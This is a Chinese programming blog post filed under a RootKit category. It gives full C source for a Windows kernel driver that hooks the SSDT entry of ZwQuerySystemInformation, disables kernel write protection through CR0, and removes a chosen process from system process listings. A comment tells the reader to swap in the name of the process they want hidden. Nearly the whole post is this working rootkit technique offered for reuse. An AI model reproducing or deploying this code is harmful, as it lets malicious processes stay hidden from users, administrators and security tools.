S.l.e!ep.¢%

像打了激速一样,以四倍的速度运转,开心的工作
简单、开放、平等的公司文化;尊重个性、自由与个人价值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

HOOK SSDT实现进程隐藏

Posted on 2009-10-24 21:01 S.l.e!ep.¢% 阅读(855) 评论(0)  编辑 收藏 引用 所属分类: RootKit

HOOK SSDT实现进程隐藏(代码)

  1. #include "Driver.h"


  4. #pragma  pack(1)
  5. typedef struct _SSDT_TABLE
  6. {
  7.   PVOID   ServiceTableBase;
  8.   PULONG  ServiceCounterTableBase;
  9.   ULONG   NumberOfService;
  10.   ULONG   ParamTableBase;
  11. }SSDT_TABLE,* PSSDT_TABLE;
  12. #pragma pack()

  14. struct _SYSTEM_THREADS
  15. {
  16.   LARGE_INTEGER           KernelTime;
  17.   LARGE_INTEGER           UserTime;
  18.   LARGE_INTEGER           CreateTime;
  19.   ULONG                           WaitTime;
  20.   PVOID                           StartAddress;
  21.   CLIENT_ID                       ClientIs;
  22.   KPRIORITY                       Priority;
  23.   KPRIORITY                       BasePriority;
  24.   ULONG                           ContextSwitchCount;
  25.   ULONG                           ThreadState;
  26.   KWAIT_REASON            WaitReason;
  27. };

  29. //===================================================
  30. struct _SYSTEM_PROCESSES
  31. {
  32.   ULONG                           NextEntryDelta;
  33.   ULONG                           ThreadCount;
  34.   ULONG                           Reserved[6];
  35.   LARGE_INTEGER           CreateTime;
  36.   LARGE_INTEGER           UserTime;
  37.   LARGE_INTEGER           KernelTime;
  38.   UNICODE_STRING          ProcessName;
  39.   KPRIORITY                       BasePriority;
  40.   ULONG                           ProcessId;
  41.   ULONG                           InheritedFromProcessId;
  42.   ULONG                           HandleCount;
  43.   ULONG                           Reserved2[2];
  44.   VM_COUNTERS                     VmCounters;
  45.   IO_COUNTERS                     IoCounters; //windows 2000 only
  46.   struct _SYSTEM_THREADS          Threads[1];
  47. };

  49. struct _SYSTEM_PROCESSOR_TIMES
  50. {
  51.    LARGE_INTEGER          IdleTime;
  52.    LARGE_INTEGER          KernelTime;
  53.    LARGE_INTEGER          UserTime;
  54.    LARGE_INTEGER          DpcTime;
  55.    LARGE_INTEGER          InterruptTime;
  56.    ULONG              InterruptCount;
  57. };


  60. //======================================================

  62. typedef NTSTATUS (__stdcall *ZWQUERYSYSTEMINFORMATION)(
  63.    IN ULONG SystemInformationClass,
  64.    IN PVOID SystemInformation,
  65.    IN ULONG SystemInformationLength,
  66.    OUT PULONG ReturnLength);



  70. NTSTATUS MyZwQuerySystemInformation(
  71.    IN ULONG SystemInformationClass,
  72.    IN PVOID SystemInformation,
  73.    IN ULONG SystemInformationLength,
  74.    OUT PULONG ReturnLength);



  78. //定义全局变量
  79. extern "C" extern PSSDT_TABLE  KeServiceDescriptorTable;
  80. ULONG  OldAddress;
  81. ZWQUERYSYSTEMINFORMATION        OldZwQuerySystemInformation;
  82. PVOID Base;

  84. //函数申明
  85. VOID DisplayItsProcessName()

  87. {
  88.         PEPROCESS Peprocess = PsGetCurrentProcess();
  89.         PTSTR ProcessName = (PTSTR)((ULONG)Peprocess+0x174);
  90.         KdPrint(("The Process :%s\n",ProcessName));
  91. }


  94. void UnHook();


  97. VOID Unload (IN PDRIVER_OBJECT pDriverObject)
  98. {

  100.         KdPrint(("Enter DriverUnload\n"));
  101.         UnHook();                                               // mark
  102. }


  105. NTSTATUS MyZwQuerySystemInformation(
  106.      IN ULONG SystemInformationClass,
  107.      IN PVOID SystemInformation,
  108.      IN ULONG SystemInformationLength,
  109.      OUT PULONG ReturnLength) //定义自己的Hook函数
  110. {
  111.    NTSTATUS rc;

  113.    UNICODE_STRING process_name;
  114.    RtlInitUnicodeString(&process_name, L"taskmgr.exe");//改成自己要隐藏进程

  116.    rc = (OldZwQuerySystemInformation) (
  117.      SystemInformationClass,
  118.      SystemInformation,
  119.      SystemInformationLength,
  120.      ReturnLength);
  121.   
  122.    if(NT_SUCCESS(rc))
  123.    {
  124.      if(5 == SystemInformationClass)
  125.      {
  126.        struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
  127.        struct _SYSTEM_PROCESSES *prev = NULL;
  128.        if(curr->NextEntryDelta)
  129.                 curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);

  131.        while(curr)
  132.        {
  133.         
  134.                                 if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))

  136.          {
  137.                                   KdPrint(("hide process'name taskmgr.exe"));


  140.            if(prev)
  141.            {
  142.              if(curr->NextEntryDelta)
  143.              {
  144.                prev->NextEntryDelta += curr->NextEntryDelta;
  145.              }
  146.              else
  147.              {
  148.                prev->NextEntryDelta = 0;
  149.              }
  150.            }
  151.            else
  152.            {
  153.              if(curr->NextEntryDelta)
  154.              {
  155.                SystemInformation =(PVOID)((ULONG)SystemInformation + curr->NextEntryDelta);
  156.              }
  157.              else
  158.              {
  159.                SystemInformation = NULL;
  160.              }
  161.            }

  163.            if(curr->NextEntryDelta)
  164.                            curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
  165.            else
  166.            {
  167.              curr = NULL;
  168.              break;
  169.            }
  170.          }

  172.          if(curr != NULL)
  173.          {
  174.            prev = curr;
  175.            if(curr->NextEntryDelta)
  176.                            curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
  177.            else curr = NULL;
  178.          }

  180.        }
  181.      }
  182.    }
  183. KdPrint(("HookZwQuerySystemInformation is Succeessfully.... \n"));
  184. DisplayItsProcessName();

  186. return rc;

  188. }


  191. VOID Hook()
  192. {
  193.         DbgPrint("Entry Hook()\n");
  194.         OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;//用windbg反汇编查到zwquerysysteminformationde
  195.                                                                                                                                                                                       //的ID号是0xADh
  196.         DbgPrint("KeServiceDescriptorTable->ServiceTableBase is :0x%0x\n",KeServiceDescriptorTable->ServiceTableBase);
  197.         //保存原来函数的地址
  198.         OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) *(ULONG *)OldAddress;
  199.   DbgPrint("OldZwQuerySystemInformation is :0x%0x\n", OldZwQuerySystemInformation);
  200.   DbgPrint("MyZwQuerySystemInformation is :0x%0x\n", MyZwQuerySystemInformation);

  202.    //取消内存写保护
  203.   _asm
  204.   {
  205.     cli
  206.    
  207.       mov  eax,cr0  
  208.       and  eax,not 10000h
  209.       mov  cr0,eax
  210.       
  211.   }
  212.   

  214.        
  215.         *(ULONG*)OldAddress =(ULONG) MyZwQuerySystemInformation;       //mark   MyZwQuerySystemInformation;
  216.   
  217.   //还原内存写保护
  218.   _asm
  219.   {  
  220.   
  221.     mov  eax,cr0
  222.       or   eax,10000h
  223.       mov  cr0,eax
  224.       sti
  225.   
  226.   
  227.   }
  228. }

  230. void UnHook()
  231. {
  232.   ULONG  Address;
  233.   
  234.   Address =(ULONG) KeServiceDescriptorTable->ServiceTableBase +0xAD*4;
  235.   
  236.   __asm{
  237.     cli
  238.       mov  eax,cr0
  239.       and  eax,not 10000h
  240.       mov  cr0,eax
  241.   }
  242.    
  243.   *(ULONG*)Address =(ULONG) OldZwQuerySystemInformation;
  244.   
  245.   __asm{  
  246.     mov  eax,cr0
  247.       or   eax,10000h
  248.       mov  cr0,eax
  249.       sti
  250.   }
  251.   
  252.   DbgPrint("Unhook leave!\n");
  253.   
  254. }
  255.   



  259. //========================驱动入口函数
  260. extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT  pDriverObject, IN PUNICODE_STRING  pRegistryPath)
  261. {
  262.   DbgPrint("Entry Hook Function!\n");

  264.         pDriverObject->DriverUnload = Unload;
  265.        
  266.         Hook();
  267.   
  268.   DbgPrint("Leave DriverEntry!\n");
  269.   
  270.         return STATUS_SUCCESS;
  271.   
  272. }
复制代码
XPSP3 WDK 顺利通过~

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理